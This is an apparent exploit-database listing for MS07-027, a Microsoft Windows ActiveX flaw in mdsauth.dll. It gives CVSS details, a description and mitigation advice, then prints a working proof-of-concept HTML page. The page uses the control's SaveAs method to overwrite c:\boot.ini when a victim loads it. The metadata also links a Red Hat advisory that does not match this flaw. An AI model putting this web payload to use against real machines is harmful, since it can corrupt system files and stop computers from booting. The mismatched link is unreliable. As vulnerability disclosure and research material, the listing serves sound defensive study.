header-logo
Suggest Exploit
vendor:
Windows
by:
Andres Tarasco Acuna
7.5
CVSS
HIGH
Arbitrary file modification
22
CWE
Product Name: Windows
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: YES
Related CWE: CVE-2007-1746
CPE: a:microsoft:windows
Metasploit: https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2011-1090/
Other Scripts:
Platforms Tested:
2007

MS07-027 mdsauth.dll NMSA Session Description Object SaveAs control, arbitrary file modification

The vulnerability allows an attacker to modify arbitrary files on the system. The exploit uses the NMSA Session Description Object SaveAs control to modify the boot.ini file. This vulnerability is documented in Microsoft Security Advisory MS07-027.

Mitigation:

Apply the patch provided by Microsoft in security advisory MS07-027. Restrict access to the vulnerable control or remove it if not required.
Source

Exploit-DB raw data:

<html>
<title> MS07-027 mdsauth.dll NMSA Session Description Object SaveAs control, arbitrary file modification </title>
<body>

<OBJECT id="target" classid="clsid:d4fe6227-1288-11d0-9097-00aa004254a0"> 

</OBJECT>
<script language="vbscript">
//next script is converted to UTF16
 target.SessionDescription="MS07-027 mdsauth.dll Proof of Concept exploit"
 target.SessionAuthor="Andres Tarasco Acuna"
 target.SessionEmailContact="atarasco_at_gmail.com"
 target.SessionURL="http://www.514.es"
 target.SaveAs "c:\boot.ini"
</script>

</body>
</html>

# milw0rm.com [2007-05-10]

Navigation

Suggest Exploit

Services By CQR